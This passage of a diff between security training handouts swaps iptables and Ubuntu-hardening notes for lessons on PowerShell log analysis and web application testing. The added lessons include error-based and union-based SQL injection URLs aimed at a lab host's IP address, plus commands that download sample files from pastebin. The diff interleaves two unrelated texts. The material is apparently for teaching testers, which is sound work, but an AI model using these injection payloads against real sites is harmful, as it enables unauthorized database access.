690	+	Get-Member is another extremely useful cmdlet that will enumerate the available methods and properties of an object. You can pipe the object to Get-Member or pass it in
691	-	infosecaddicts
691	+	------------------------Type This------------------------------
692		$serv \| Get-Member
693
694		Get-Member -InputObject $serv
695		---------------------------------------------------------------
696	-	sudo /bin/bash
696	+
697
698
699
700	-	- Block a Specific ip-address
700	+	Let's use a method and a property with our object.
701	-	-----------------------------
701	+	------------------------Type This------------------------------
702	-	BLOCK_THIS_IP="1.2.3.4"
702	+	$serv.Status
703	-	iptables -A INPUT -s "$BLOCK_THIS_IP" -j DROP
703	+	$serv.Stop()
704		$serv.Refresh()
705		$serv.Status
706	-	iptables -A INPUT -i eth0 -s "$BLOCK_THIS_IP" -j DROP
706	+	$serv.Start()
707	-	iptables -A INPUT -i eth0 -p tcp -s "$BLOCK_THIS_IP" -j DROP
707	+	$serv.Refresh()
708		$serv.Status
709		---------------------------------------------------------------
710	-	- Allow ALL Incoming SSH
710	+
711	-	------------------------
711	+
712	-	iptables -A INPUT -i eth0 -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
712	+	If you want some good command-line shortcuts you can check out the following link:
713	-	iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
713	+	https://technet.microsoft.com/en-us/library/ff678293.aspx
714
715		#############################
716	-	- Allow Incoming SSH only from a Sepcific Network
716	+	# Simple Event Log Analysis #
717	-	-------------------------------------------------
717	+	#############################
718	-	iptables -A INPUT -i eth0 -p tcp -s 192.168.100.0/24 --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
718	+	Let's setup a directory to work in:
719	-	iptables -A OUTPUT -o eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
719	+	------------------------Type This------------------------------
720		cd c:\
721
722	-	- Allow Incoming HTTP and HTTPS
722	+	mkdir ps
723
724	-	iptables -A INPUT -i eth0 -p tcp --dport 80 -m state --state NEW,ESTABLISHED -j ACCEPT
724	+	cd ps
725	-	iptables -A OUTPUT -o eth0 -p tcp --sport 80 -m state --state ESTABLISHED -j ACCEPT
725	+	---------------------------------------------------------------
726
727		Step 1: Dump the event logs
728	-	iptables -A INPUT -i eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
728	+	---------------------------
729	-	iptables -A OUTPUT -o eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
729	+	The first thing to do is to dump them into a format that facilitates later processing with Windows PowerShell.
730
731		To dump the event log, you can use the Get-EventLog and the Exportto-Clixml cmdlets if you are working with a traditional event log such as the Security, Application, or System event logs.
732		If you need to work with one of the trace logs, use the Get-WinEvent and the ExportTo-Clixml cmdlets.
733	-	- Combine Multiple Rules Together using MultiPorts
733	+	------------------------Type This------------------------------
734	-	--------------------------------------------------
734	+	Get-EventLog -LogName application \| Export-Clixml Applog.xml
735	-	iptables -A INPUT -i eth0 -p tcp -m multiport --dports 22,80,443 -m state --state NEW,ESTABLISHED -j ACCEPT
735	+
736	-	iptables -A OUTPUT -o eth0 -p tcp -m multiport --sports 22,80,443 -m state --state ESTABLISHED -j ACCEPT
736	+	type .\Applog.xml
737
738		$logs = "system","application","security"
739	-	- Allow Outgoing SSH
739	+	---------------------------------------------------------------
740	-	--------------------
740	+
741	-	iptables -A OUTPUT -o eth0 -p tcp --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
741	+
742	-	iptables -A INPUT -i eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
742	+	The % symbol is an alias for the Foreach-Object cmdlet. It is often used when working interactively from the Windows PowerShell console
743		------------------------Type This------------------------------
744		$logs \| % { get-eventlog -LogName $_ \| Export-Clixml "$_.xml" }
745	-	- Allow Outgoing SSH only to a Specific Network
745	+	---------------------------------------------------------------
746
747	-	The following rules allow outgoing ssh connection only to a specific network. i.e You an ssh only to 192.168.100.0/24 network from the inside.
747	+
748
749	-	iptables -A OUTPUT -o eth0 -p tcp -d 192.168.100.0/24 --dport 22 -m state --state NEW,ESTABLISHED -j ACCEPT
749	+
750	-	iptables -A INPUT -i eth0 -p tcp --sport 22 -m state --state ESTABLISHED -j ACCEPT
750	+	Step 2: Import the event log of interest
751		----------------------------------------
752		To parse the event logs, use the Import-Clixml cmdlet to read the stored XML files.
753		Store the results in a variable.
754	-	- Allow Outgoing HTTPS
754	+	Let's take a look at the commandlets Where-Object, Group-Object, and Select-Object.
755	-	----------------------
755	+
756	-	The following rules allow outgoing secure web traffic. This is helpful when you want to allow internet traffic for your users. On servers, these rules are also helpful when you want to use wget to download some files from outside.
756	+	The following two commands first read the exported security log contents into a variable named $seclog, and then the five oldest entries are obtained.
757		------------------------Type This------------------------------
758	-	iptables -A OUTPUT -o eth0 -p tcp --dport 443 -m state --state NEW,ESTABLISHED -j ACCEPT
758	+	$seclog = Import-Clixml security.xml
759	-	iptables -A INPUT -i eth0 -p tcp --sport 443 -m state --state ESTABLISHED -j ACCEPT
759	+
760		$seclog \| select -Last 5
761		---------------------------------------------------------------
762
763		Cool trick from one of our students named Adam. This command allows you to look at the logs for the last 24 hours:
764	-	Load Balance Incoming Web Traffic
764	+	------------------------Type This------------------------------
765	-	---------------------------------
765	+	Get-EventLog Application -After (Get-Date).AddDays(-1)
766	-	You can also load balance your incoming web traffic using iptables firewall rules.
766	+	---------------------------------------------------------------
767		You can use '-after' and '-before' to filter date ranges
768	-	This uses the iptables nth extension. The following example load balances the HTTPS traffic to three different ip-address. For every 3th packet, it is load balanced to the appropriate server (using the counter 0).
768	+
769		One thing you must keep in mind is that once you export the security log to XML, it is no longer protected by anything more than the NFTS and share permissions that are assigned to the location where you store everything.
770	-	iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 0 -j DNAT --to-destination 192.168.1.101:443
770	+	By default, an ordinary user does not have permission to read the security log.
771	-	iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 1 -j DNAT --to-destination 192.168.1.102:443
771	+
772	-	iptables -A PREROUTING -i eth0 -p tcp --dport 443 -m state --state NEW -m nth --counter 0 --every 3 --packet 2 -j DNAT --to-destination 192.168.1.103:443
772	+
773
774
775		Step 3: Drill into a specific entry
776	-	Allow Ping from Outside to Inside
776	+
777	-	---------------------------------
777	+	To view the entire contents of a specific event log entry, choose that entry, send the results to the Format-List cmdlet, and choose all of the properties.
778	-	The following rules allow outside users to be able to ping your servers.
778	+
779		------------------------Type This------------------------------
780	-	iptables -A INPUT -p icmp --icmp-type echo-request -j ACCEPT
780	+	$seclog \| select -first 1 \| fl *
781	-	iptables -A OUTPUT -p icmp --icmp-type echo-reply -j ACCEPT
781	+	---------------------------------------------------------------
782
783		The message property contains the SID, account name, user domain, and privileges that are assigned for the new login.
784
785	-	Allow Ping from Inside to Outside
785	+	------------------------Type This------------------------------
786	-	---------------------------------
786	+	($seclog \| select -first 1).message
787	-	The following rules allow you to ping from inside to any of the outside servers.
787	+
788		(($seclog \| select -first 1).message).gettype()
789	-	iptables -A OUTPUT -p icmp --icmp-type echo-request -j ACCEPT
789	+	---------------------------------------------------------------
790	-	iptables -A INPUT -p icmp --icmp-type echo-reply -j ACCEPT
790	+
791
792		In the *nix world you often want a count of something (wc -l).
793		How often is the SeSecurityPrivilege privilege mentioned in the message property?
794	-	Allow Loopback Access
794	+	To obtain this information, pipe the contents of the security log to a Where-Object to filter the events, and then send the results to the Measure-Object cmdlet to determine the number of events:
795	-	---------------------
795	+	------------------------Type This------------------------------
796	-	You should allow full loopback access on your servers. i.e access using 127.0.0.1
796	+	$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| measure
797		---------------------------------------------------------------
798	-	iptables -A INPUT -i lo -j ACCEPT
798	+	If you want to ensure that only event log entries return that contain SeSecurityPrivilege in their text, use Group-Object to gather the matches by the EventID property.
799	-	iptables -A OUTPUT -o lo -j ACCEPT
799	+
800		------------------------Type This------------------------------
801		$seclog \| ? { $_.message -match 'SeSecurityPrivilege'} \| group eventid
802		---------------------------------------------------------------
803	-	Allow Internal Network to External network
803	+
804	-	------------------------------------------
804	+	Because importing the event log into a variable from the stored XML results in a collection of event log entries, it means that the count property is also present.
805	-	On the firewall server where one ethernet card is connected to the external, and another ethernet card connected to the internal servers, use the following rules to allow internal network talk to external network.
805	+	Use the count property to determine the total number of entries in the event log.
806		------------------------Type This------------------------------
807	-	In this example, eth1 is connected to external network (internet), and eth0 is connected to internal network (For example: 192.168.1.x).
807	+	$seclog.Count
808		---------------------------------------------------------------
809	-	iptables -A FORWARD -i eth0 -o eth1 -j ACCEPT
809	+
810
811
812
813	-	Allow outbound DNS
813	+
814	-	------------------
814	+
815	-	The following rules allow outgoing DNS connections.
815	+	# Simple Log File Analysis #
816		############################
817	-	iptables -A OUTPUT -p udp -o eth0 --dport 53 -j ACCEPT
817	+
818	-	iptables -A INPUT -p udp -i eth0 --sport 53 -j ACCEPT
818	+
819		You'll need to create the directory c:\ps and download sample iss log http://pastebin.com/raw.php?i=LBn64cyA
820
821		------------------------Type This------------------------------
822	-	Allow Rsync From a Specific Network
822	+	cd c:\ps
823		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
824	-	The following rules allows rsync only from a specific network.
824	+	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=ysnhXxTV", "c:\ps\CiscoLogFileExamples.txt")
825		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt
826	-	iptables -A INPUT -i eth0 -p tcp -s 192.168.101.0/24 --dport 873 -m state --state NEW,ESTABLISHED -j ACCEPT
826	+	---------------------------------------------------------------
827	-	iptables -A OUTPUT -o eth0 -p tcp --sport 873 -m state --state ESTABLISHED -j ACCEPT
827	+
828
829
830		The Select-String cmdlet searches for text and text patterns in input strings and files. You can use it like Grep in UNIX and Findstr in Windows.
831	-	Allow MySQL connection only from a specific network
831	+	------------------------Type This------------------------------
832		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line
833	-	If you are running MySQL, typically you don’t want to allow direct connection from outside. In most cases, you might have web server running on the same server where the MySQL database runs.
833	+	---------------------------------------------------------------
834
835	-	However DBA and developers might need to login directly to the MySQL from their laptop and desktop using MySQL client. In those case, you might want to allow your internal network to talk to the MySQL directly as shown below.
835	+
836
837	-	iptables -A INPUT -i eth0 -p tcp -s 192.168.100.0/24 --dport 3306 -m state --state NEW,ESTABLISHED -j ACCEPT
837	+	To see how many connections are made when analyzing a single host, the output from that can be piped to another command: Measure-Object.
838	-	iptables -A OUTPUT -o eth0 -p tcp --sport 3306 -m state --state ESTABLISHED -j ACCEPT
838	+	------------------------Type This------------------------------
839		Select-String 192.168.208.63 .\CiscoLogFileExamples.txt \| select line \| Measure-Object
840		---------------------------------------------------------------
841
842	-	Allow Sendmail or Postfix Traffic
842	+
843	-	---------------------------------
843	+	To select all IP addresses in the file expand the matches property, select the value, get unique values and measure the output.
844	-	The following rules allow mail traffic. It may be sendmail or postfix.
844	+	------------------------Type This------------------------------
845		Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique \| Measure-Object
846	-	iptables -A INPUT -i eth0 -p tcp --dport 25 -m state --state NEW,ESTABLISHED -j ACCEPT
846	+	---------------------------------------------------------------
847	-	iptables -A OUTPUT -o eth0 -p tcp --sport 25 -m state --state ESTABLISHED -j ACCEPT
847	+
848
849		Removing Measure-Object shows all the individual IPs instead of just the count of the IP addresses. The Measure-Object command counts the IP addresses.
850	-	Allow IMAP and IMAPS
850	+	------------------------Type This------------------------------
851	-	--------------------
851	+	Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select -ExpandProperty value \| Sort-Object -Unique
852	-	The following rules allow IMAP/IMAP2 traffic.
852	+	---------------------------------------------------------------
853
854	-	iptables -A INPUT -i eth0 -p tcp --dport 143 -m state --state NEW,ESTABLISHED -j ACCEPT
854	+	In order to determine which IP addresses have the most communication the last commands are removed to determine the value of the matches. Then the group command is issued on the piped output to group all the IP addresses (value), and then sort the objects by using the alias for Sort-Object: sort count –des.
855	-	iptables -A OUTPUT -o eth0 -p tcp --sport 143 -m state --state ESTABLISHED -j ACCEPT
855	+	This sorts the IP addresses in a descending pattern as well as count and deliver the output to the shell.
856		------------------------Type This------------------------------
857		Select-String "\b(?:\d{1,3}\.){3}\d{1,3}\b" .\CiscoLogFileExamples.txt \| select -ExpandProperty matches \| select value \| group value \| sort count -des
858	-	The following rules allow IMAPS traffic.
858	+	---------------------------------------------------------------
859
860	-	iptables -A INPUT -i eth0 -p tcp --dport 993 -m state --state NEW,ESTABLISHED -j ACCEPT
860	+
861	-	iptables -A OUTPUT -o eth0 -p tcp --sport 993 -m state --state ESTABLISHED -j ACCEPT
861	+
862		##############################################
863		# Parsing Log files using windows PowerShell #
864		##############################################
865
866	-	Allow POP3 and POP3S
866	+	Download the sample IIS log http://pastebin.com/LBn64cyA
867	-	--------------------
867	+
868	-	The following rules allow POP3 access.
868	+	------------------------Type This------------------------------
869		(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=LBn64cyA", "c:\ps\u_ex1104.log")
870	-	iptables -A INPUT -i eth0 -p tcp --dport 110 -m state --state NEW,ESTABLISHED -j ACCEPT
870	+
871	-	iptables -A OUTPUT -o eth0 -p tcp --sport 110 -m state --state ESTABLISHED -j ACCEPT
871	+	Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV")}
872	-	The following rules allow POP3S access.
872	+	---------------------------------------------------------------
873
874	-	iptables -A INPUT -i eth0 -p tcp --dport 995 -m state --state NEW,ESTABLISHED -j ACCEPT
874	+
875	-	iptables -A OUTPUT -o eth0 -p tcp --sport 995 -m state --state ESTABLISHED -j ACCEPT
875	+	The above command would give us all the WebDAV requests.
876
877		To filter this to a particular user name, use the below command:
878		------------------------Type This------------------------------
879	-	Port Forwarding
879	+	Get-Content ".\*log" \| ? { ($_ \| Select-String "WebDAV") -and ($_ \| Select-String "OPTIONS")}
880	-	---------------
880	+	---------------------------------------------------------------
881	-	The following example routes all traffic that comes to the port 442 to 22. This means that the incoming ssh connection can come from both port 22 and 422.
881	+
882
883	-	iptables -t nat -A PREROUTING -p tcp -d 192.168.102.37 --dport 422 -j DNAT --to 192.168.102.37:22
883	+	Some more options that will be more commonly required :
884
885	-	If you do the above, you also need to explicitly allow incoming connection on the port 422.
885	+	For Outlook Web Access : Replace WebDAV with OWA
886
887	-	iptables -A INPUT -i eth0 -p tcp --dport 422 -m state --state NEW,ESTABLISHED -j ACCEPT
887	+	For EAS : Replace WebDAV with Microsoft-server-activesync
888	-	iptables -A OUTPUT -o eth0 -p tcp --sport 422 -m state --state ESTABLISHED -j ACCEPT
888	+
889		For ECP : Replace WebDAV with ECP
890
891	-	Log Dropped Packets
891	+
892
893	-	You might also want to log all the dropped packets. These rules should be at the bottom.
893	+
894
895	-	First, create a new chain called LOGGING.
895	+
896
897	-	iptables -N LOGGING
897	+	####################################################################
898	-	Next, make sure all the remaining incoming connections jump to the LOGGING chain as shown below.
898	+	# Windows PowerShell: Extracting Strings Using Regular Expressions #
899		####################################################################
900	-	iptables -A INPUT -j LOGGING
900	+
901	-	Next, log these packets by specifying a custom “log-prefix”.
901	+
902		Regex Characters you might run into:
903	-	iptables -A LOGGING -m limit --limit 2/min -j LOG --log-prefix "IPTables Packet Dropped: " --log-level 7
903	+
904	-	Finally, drop these packets.
904	+	^ Start of string, or start of line in a multiline pattern
905		$ End of string, or start of line in a multiline pattern
906	-	iptables -A LOGGING -j DROP
906	+	\b Word boundary
907		\d Digit
908		\ Escape the following character
909		* 0 or more {3} Exactly 3
910		+ 1 or more {3,} 3 or more
911	-	# Ubuntu Perfect Server #
911	+	? 0 or 1 {3,5} 3, 4 or 5
912
913
914
915	-	https://www.howtoforge.com/tutorial/ubuntu-perfect-server-with-apache-php-myqsl-pureftpd-bind-postfix-doveot-and-ispconfig/
915	+	To build a script that will extract data from a text file and place the extracted text into another file, we need three main elements:
916
917		1) The input file that will be parsed
918	-	deb http://de.archive.ubuntu.com/ubuntu/ yakkety main restricted
918	+	------------------------Type This------------------------------
919	-	deb http://de.archive.ubuntu.com/ubuntu/ yakkety-updates main restricted
919	+	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=rDN3CMLc", "c:\ps\emails.txt")
920	-	deb http://de.archive.ubuntu.com/ubuntu/ yakkety universe
920	+	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=XySD8Mi2", "c:\ps\ip_addresses.txt")
921	-	deb http://de.archive.ubuntu.com/ubuntu/ yakkety-updates universe
921	+	(new-object System.Net.WebClient).DownloadFile("http://pastebin.com/raw.php?i=v5Yq66sH", "c:\ps\URL_addresses.txt")
922	-	deb http://de.archive.ubuntu.com/ubuntu/ yakkety-updates multiverse
922	+	---------------------------------------------------------------
923		2) The regular expression that the input file will be compared against
924
925	-	Then run
925	+	3) The output file for where the extracted data will be placed.
926	-	apt-get update
926	+
927		Windows PowerShell has a "select-string" cmdlet which can be used to quickly scan a file to see if a certain string value exists.
928	-	to update the apt package database and
928	+	Using some of the parameters of this cmdlet, we are able to search through a file to see whether any strings match a certain pattern, and then output the results to a separate file.
929	-	apt-get upgrade
929	+
930		To demonstrate this concept, below is a Windows PowerShell script I created to search through a text file for strings that match the Regular Expression (or RegEx for short) pattern belonging to e-mail addresses.
931	-	to install the latest updates (if there are any). If you see that a new kernel gets installed as part of the updates, you should reboot the system afterwards:
931	+	------------------------Type This------------------------------
932	-	reboot
932	+	$input_path = 'c:\ps\emails.txt'
933		$output_file = 'c:\ps\extracted_addresses.txt'
934	-	Change the Default Shell
934	+	$regex = '\b[A-Za-z0-9._%-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,4}\b'
935	-	/bin/sh is a symlink to /bin/dash, however we need /bin/bash, not /bin/dash. Therefore, we do this:
935	+	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
936	-	dpkg-reconfigure dash
936	+	---------------------------------------------------------------
937
938	-	Use dash as the default system shell (/bin/sh)? <-- No
938	+
939		In this script, we have the following variables:
940	-	Disable AppArmor
940	+
941	-	----------------
941	+	1) $input_path to hold the path to the input file we want to parse
942	-	AppArmor is a security extension (similar to SELinux) that should provide extended security. In my opinion, you don't need it to configure a secure system, and it usually causes more problems than advantages (think of it after you have done a week of trouble-shooting because some service wasn't working as expected, and then you find out that everything was ok, only AppArmor was causing the problem). Therefore, I disable it (this is a must if you want to install ISPConfig later on).
942	+
943	-	We can disable it like this:
943	+	2) $output_file to hold the path to the file we want the results to be stored in
944
945	-	service apparmor stop
945	+	3) $regex to hold the regular expression pattern to be used when the strings are being matched.
946	-	update-rc.d -f apparmor remove
946	+
947	-	apt-get remove apparmor apparmor-utils
947	+	The select-string cmdlet contains various parameters as follows:
948
949		1) "-Path" which takes as input the full path to the input file
950	-	apt-get -y install ntp ntpdate
950	+
951		2) "-Pattern" which takes as input the regular expression used in the matching process
952	-	Install Postfix, Dovecot, MariaDB, rkhunter and binutils
952	+
953	-	--------------------------------------------------------
953	+	3) "-AllMatches" which searches for more than one match (without this parameter it would stop after the first match is found) and is piped to "$.Matches" and then "$_.Value" which represent using the current values of all the matches.
954	-	For installing postfix, we need to ensure that sendmail is not installed and running. To stop and remove sendmail run this command:
954	+
955		Using ">" the results are written to the destination specified in the $output_file variable.
956	-	service sendmail stop; update-rc.d -f sendmail remove
956	+
957		Here are two further examples of this script which incorporate a regular expression for extracting IP addresses and URLs.
958
959		IP addresses
960		------------
961	-	#######################
961	+	For the purposes of this example, I ran the tracert command to trace the route from my host to google.com and saved the results into a file called ip_addresses.txt. You may choose to use this script for extracting IP addresses from router logs, firewall logs, debug logs, etc.
962	-	# Hardening Ubuntu 16 #
962	+	------------------------Type This------------------------------
963	-	#######################
963	+	$input_path = 'c:\ps\ip_addresses.txt'
964		$output_file = 'c:\ps\extracted_ip_addresses.txt'
965	-	This guide is intended as a relatively easy step by step guide to:
965	+	$regex = '\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\b'
966		select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
967	-	Harden the security on an Ubuntu 16.04 LTS server by installing and configuring the following:
967	+	---------------------------------------------------------------
968
969	-	Install and configure Firewall - ufw
969	+
970	-	Secure shared memory - fstab
970	+
971	-	SSH - Key based login, disable root login and change port
971	+	URLs
972	-	Apache SSL - Disable SSL v3 support
972	+	----
973	-	Protect su by limiting access only to admin group
973	+	For the purposes of this example, I created a couple of dummy web server log entries and saved them into URL_addresses.txt.
974	-	Harden network with sysctl settings
974	+	You may choose to use this script for extracting URL addresses from proxy logs, network packet capture logs, debug logs, etc.
975	-	Disable Open DNS Recursion and Remove Version Info - Bind9 DNS
975	+	------------------------Type This------------------------------
976	-	Prevent IP Spoofing
976	+	$input_path = 'c:\ps\URL_addresses.txt'
977	-	Harden PHP for security
977	+	$output_file = 'c:\ps\extracted_URL_addresses.txt'
978	-	Restrict Apache Information Leakage
978	+	$regex = '([a-zA-Z]{3,})://([\w-]+\.)+[\w-]+(/[\w- ./?%&=])?'
979	-	Install and configure Apache application firewall - ModSecurity
979	+	select-string -Path $input_path -Pattern $regex -AllMatches \| % { $_.Matches } \| % { $_.Value } > $output_file
980	-	Protect from DDOS (Denial of Service) attacks with ModEvasive
980	+	---------------------------------------------------------------
981	-	Scan logs and ban suspicious hosts - DenyHosts and Fail2Ban
981	+
982	-	Intrusion Detection - PSAD
982	+	In addition to the examples above, many other types of strings can be extracted using this script.
983	-	Check for RootKits - RKHunter and CHKRootKit
983	+	All you need to do is switch the regular expression in the "$regex" variable!
984	-	Scan open Ports - Nmap
984	+	In fact, the beauty of such a PowerShell script is its simplicity and speed of execution.
985	-	Analyse system LOG files - LogWatch
985	+
986	-	Apparmor - Application Armor
986	+
987	-	Audit your system security - Tiger and Tripwire
987	+	##################################
988	-	Requirements:
988	+	# Basic: Web Application Testing #
989		##################################
990	-	Ubuntu 16.04 LTS or later server with a standard LAMP stack installed.
990	+
991	-	1. Firewall - UFW
991	+	Most people are going to tell you reference the OWASP Testing guide.
992		https://www.owasp.org/index.php/OWASP_Testing_Guide_v4_Table_of_Contents
993	-	A good place to start is to install a Firewall.
993	+
994	-	UFW - Uncomplicated Firewall is a basic firewall that works very well and easy to configure with its Firewall configuration tool - gufw, or use Shorewall, fwbuilder, or Firestarter.
994	+	I'm not a fan of it for the purpose of actual testing. It's good for defining the scope of an assessment, and defining attacks, but not very good for actually attacking a website.
995	-	Use Firestarter GUI to configure your firewall or refer to the Ubuntu Server Guide, UFW manual pages or the Ubuntu UFW community documentation.
995	+
996	-	Install UFW and enable, open a terminal window and enter :
996	+
997	-	sudo apt-get install ufw
997	+	The key to doing a Web App Assessment is to ask yourself the 3 web questions on every page in the site.
998	-	Allow SSH and Http services.
998	+
999	-	sudo ufw allow ssh
999	+	1. Does the website talk to a DB?
1000	-	sudo ufw allow http
1000	+	- Look for parameter passing (ex: site.com/page.php?id=4)
1001	-	Enable the firewall.
1001	+	- If yes - try SQL Injection
1002	-	sudo ufw enable
1002	+
1003	-	Check the status of the firewall.
1003	+	2. Can I or someone else see what I type?
1004	-	sudo ufw status verbose
1004	+	- If yes - try XSS
1005	-	2. Secure shared memory.
1005	+
1006		3. Does the page reference a file?
1007	-	Shared memory can be used in an attack against a running service. Modify /etc/fstab to make it more secure.
1007	+	- If yes - try LFI/RFI
1008	-	Open a Terminal Window and enter the following :
1008	+
1009	-	sudo vi /etc/fstab
1009	+	Let's start with some manual testing against 45.77.162.239
1010	-	Add the following line and save. You will need to reboot for this setting to take effect :
1010	+
1011	-	Note : This only is works in Ubuntu 12.10 or later - For earlier Ubuntu versions replace /run/shm with /dev/shm
1011	+
1012	-	Save and Reboot when done
1012	+	Start here:
1013	-	tmpfs /run/shm tmpfs defaults,noexec,nosuid 0 0
1013	+	---------------------------Paste this into Firefox-----------------------------------
1014	-	3. SSH Hardening - key based login, disable root login and change port.
1014	+	http://45.77.162.239/
1015		-----------------------------------------------------------------------
1016	-	The best way to secure SSH is to use public/private key based login. See SSH/OpenSSH/Keys
1016	+
1017	-	If you have to use password authentication, the easiest way to secure SSH is to disable root login and change the SSH port to something different than the standard port 22.
1017	+	Let's try throwing a single quote (') in there:
1018	-	Before disabling the root login create a new SSH user and make sure the user belongs to the admin group (see step 4. below regarding the admin group).
1018	+	---------------------------Paste this into Firefox-----------------------------------
1019	-	if you change the SSH port keep the port number below 1024 as these are priviledged ports that can only be opened by root or processes running as root.
1019	+	http://45.77.162.239/bookdetail.aspx?id=2'
1020	-	If you change the SSH port also open the new port you have chosen on the firewall and close port 22.
1020	+	-------------------------------------------------------------------------------------
1021	-	Open a Terminal Window and enter :
1021	+
1022	-	sudo vi /etc/ssh/sshd_config
1022	+	I get the following error:
1023	-	Change or add the following and save.
1023	+
1024	-	Port <ENTER YOUR PORT>
1024	+	Unclosed quotation mark after the character string ''.
1025	-	Protocol 2
1025	+	Description: An unhandled exception occurred during the execution of the current web request. Please review the stack trace for more information about the error and where it originated in the code.
1026	-	PermitRootLogin no
1026	+
1027	-	DebianBanner no
1027	+	Exception Details: System.Data.SqlClient.SqlException: Unclosed quotation mark after the character string ''.
1028	-	Restart SSH server, open a Terminal Window and enter :
1028	+
1029	-	sudo service ssh restart
1029	+
1030	-	4. Apache SSL Hardening - disable SSL v2/v3 support.
1030	+
1031
1032	-	The SSL v2/v3 protocol has been proven to be insecure.
1032	+
1033	-	We will disable Apache support for the protocol and force the use of the newer protocols.
1033	+
1034	-	Open a Terminal Window and enter :
1034	+
1035	-	sudo vi /etc/apache2/mods-available/ssl.conf
1035	+
1036	-	Change this line from :
1036	+
1037	-	SSLProtocol all -SSLv3
1037	+
1038	-	To the following and save.
1038	+	#########################################################################################
1039	-	SSLProtocol all -SSLv2 -SSLv3
1039	+	# SQL Injection #
1040	-	Restart the Apache server, open a Terminal Window and enter :
1040	+	# https://s3.amazonaws.com/infosecaddictsfiles/1-Intro_To_SQL_Intection.pptx #
1041	-	sudo service apache2 restart
1041	+	#########################################################################################
1042	-	5. Protect su by limiting access only to admin group.
1042	+
1043
1044	-	To limit the use of su by admin users only we need to create an admin group, then add users and limit the use of su to the admin group.
1044	+	- Another quick way to test for SQLI is to remove the parameter value
1045	-	Add a admin group to the system and add your own admin username to the group by replacing <YOUR ADMIN USERNAME> below with your admin username.
1045	+
1046	-	Open a terminal window and enter:
1046	+
1047	-	sudo groupadd admin
1047	+	#############################
1048	-	sudo usermod -a -G admin <YOUR ADMIN USERNAME>
1048	+	# Error-Based SQL Injection #
1049	-	sudo dpkg-statoverride --update --add root admin 4750 /bin/su
1049	+	#############################
1050	-	6. Harden network with sysctl settings.
1050	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1051		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(0))--
1052	-	The /etc/sysctl.conf file contain all the sysctl settings.
1052	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(1))--
1053	-	Prevent source routing of incoming packets and log malformed IP's enter the following in a terminal window:
1053	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(2))--
1054	-	sudo vi /etc/sysctl.conf
1054	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(3))--
1055	-	Edit the /etc/sysctl.conf file and un-comment or add the following lines :
1055	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(4))--
1056	-	# IP Spoofing protection
1056	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (SELECT DB_NAME(N))-- NOTE: "N" - just means to keep going until you run out of databases
1057	-	net.ipv4.conf.all.rp_filter = 1
1057	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85))--
1058	-	net.ipv4.conf.default.rp_filter = 1
1058	+	http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'bookmaster')--
1059		http://45.77.162.239/bookdetail.aspx?id=2 or 1 in (select top 1 name from sysobjects where xtype=char(85) and name>'sysdiagrams')--
1060	-	# Ignore ICMP broadcast requests
1060	+	---------------------------------------------------------------------------------------------------------
1061	-	net.ipv4.icmp_echo_ignore_broadcasts = 1
1061	+
1062
1063	-	# Disable source packet routing
1063	+
1064	-	net.ipv4.conf.all.accept_source_route = 0
1064	+
1065	-	net.ipv6.conf.all.accept_source_route = 0
1065	+
1066	-	net.ipv4.conf.default.accept_source_route = 0
1066	+	#############################
1067	-	net.ipv6.conf.default.accept_source_route = 0
1067	+	# Union-Based SQL Injection #
1068		#############################
1069	-	# Ignore send redirects
1069	+	---------------------------Paste these one line at a time into Firefox-----------------------------------
1070	-	net.ipv4.conf.all.send_redirects = 0
1070	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 100--
1071	-	net.ipv4.conf.default.send_redirects = 0
1071	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 50--
1072		http://45.77.162.239/bookdetail.aspx?id=2 order by 25--
1073	-	# Block SYN attacks
1073	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 10--
1074	-	net.ipv4.tcp_syncookies = 1
1074	+	http://45.77.162.239/bookdetail.aspx?id=2 order by 5--
1075	-	net.ipv4.tcp_max_syn_backlog = 2048
